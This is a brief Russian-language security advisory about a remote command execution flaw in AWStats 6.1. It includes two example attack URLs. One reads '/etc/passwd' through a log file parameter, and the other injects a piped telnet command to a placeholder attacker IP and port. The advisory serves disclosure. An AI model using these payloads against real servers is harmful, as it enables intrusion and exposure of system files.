Security Lab

Удаленное выполнение произвольных команд в AWStats

Дата публикации:21.08.2004
Всего просмотров:2295
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: AWStats 6.1

Описание: Уязвимость в AWStats позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Пример:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>

URL производителя: http://awstats.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: AWStats